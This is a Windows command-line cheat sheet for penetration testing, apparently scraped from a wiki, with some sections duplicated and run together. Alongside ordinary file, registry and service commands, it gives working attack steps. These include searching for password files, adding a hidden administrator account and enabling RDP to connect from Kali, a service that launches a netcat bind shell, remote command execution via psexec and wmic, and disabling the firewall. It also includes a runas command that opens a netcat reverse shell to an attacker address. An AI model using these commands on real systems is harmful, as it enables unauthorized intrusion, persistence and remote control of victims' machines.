1 Windows cmd kungfu
Search
type myfile ..display
type *.txt ..multiple
type my1 my2 ..multiple
type my1 | find /i "pass" ..search-in-file
type my1 | findstr [regex]
more my1 ..onepage-at-a-time
set ..view env vars
set path ..view path
set username ..view usern
dir /b /s mydir\file
dir /b /s c:\pass.txt
dir /b /s %systemroot%\hosts
b - bare
s - subdir/recurse
search all of c: for 'pass.txt' even subfolders
wildcards are supported too
--------------------
--------------------
Software Inventory Search:
dir /s "c:\Program Files"
dir /s "c:\Program Files (x86)"Read Files
type myfile ..display
type *.txt ..multiple
type my1 my2 ..multiple
type my1 | find /i "pass" ..search-in-file
type my1 | findstr [regex] ..regex
more my1 ..onepage-at-a-timeEnvironment
set ..view env vars
set path ..view path
set username ..view usernSearch:
b - bare
s - subdir/recurse
dir /b /s mydir\file
dir /b /s c:\pass.txt ..search all of c: for 'pass.txt'
dir /b /s %systemroot%\hosts ..find the hosts fileSoftware Inventory Search:
dir /s "c:\Program Files"
dir /s "c:\Program Files (x86)"Windows Users
net user
net user mike p$$wrd /add
net user mike /del
net localgroup
net localgroup administrators
net localgroup administrators mike /add
net localgroup administrators mike /delAD Lockout Settings
net accounts /domainRDP Trick
REF: PrivEscWin-Churrasco
> net user
> net user mikes hacks /add
> net localgroup administrators mikes /add
Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mike -p hacks legacy ..CONNECT WITH RDP !!!Windows Password policy
net accounts
net accounts /domain
wmic useraccount list briefWindows registry
reg query key1
reg \\mypc query key1
reg add key1 /v value /t type /d data
reg export key1 key.reg
reg import key.regWindows smb
REF: MoveFilesSMB
session:
net use \\IP pw /u:bob
mount:
net use * \\IP\share pw /u:bob
net use \\IP /del
net use * /del /y
may need:
/u:machinename\bobWindows services
sc query sc query state= all
sc qc svcname sc \10.0.0.5 qc mysvc
sc start mysvc
sc config mysvc start= demand
sc stop mysvc services.msc ..gui
wmic:
where (displayname like "%hello%") get nameWindows psexec
net use \\$IP /u:bob ..get smb session
psexec \\$IP -d -u -p command ..leaves svc @finish
psexec \\$IP ipconfig
psexec \\$IP cmd.exe
psexec \\$IP cmd.exe -s -d ..system, detached/backgroundWindows schedule tasks
schtasks /query /s $IP
schtasks /create /tn taskname /s $IP /u bob /p pass
/sc freq /st stime /sd sdate /tr command
schtasks /create /tn taskname /s $IP /ru ..system
/sc HOURLY/ONCE/DAILY /st HH:MM:SS
/sd sdate /tr commandWindows Services & Processes
net use \\$IP /u:bob ..get smb session first!!
sc \\$IP query schedule
sc \\$IP create svcnm binpath= mycmd ..30 sec
sc \\$IP create svcnm binpath= "cmd.exe /k mycmd" ..will die
sc \\$IP create ncsvc binpath= "cmd.exe /k c:\Tools\nc.exe -lp 4444 -e cmd.exe"
sc \\$IP start svcnm
net time \\$IP
or 'ServifyThis'
wmic /node:/10.x.x.x /user:bobadmin /password:p@ss process call create [command]
Multiples sessions!
wmic /node:@C:\tmp\iplist /user:bob /password:paxx
process call create [command]
Look at processes:
wmic /node:/$IP /user:bob /password:paxx
process list brief
process where processid="PID" delete
process where name="[name]" deleteWindows Firewall
netsh /? ..view network settings
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name "Comment" dir=in action=allow remoteid=$IP protocol=TCP localport=23
netsh advfirewall firewall del rule name "Comment"
Port-forward:
netsh interface portproxy add v4tov4 listenport=8000 connectport=80 connectaddress=$IPrunas
Creates a reverse shell from a windows server to Kali
Using netcat for Windows and Runas.exe:
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc $IP 4444 -e cmd.exe"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...Last updated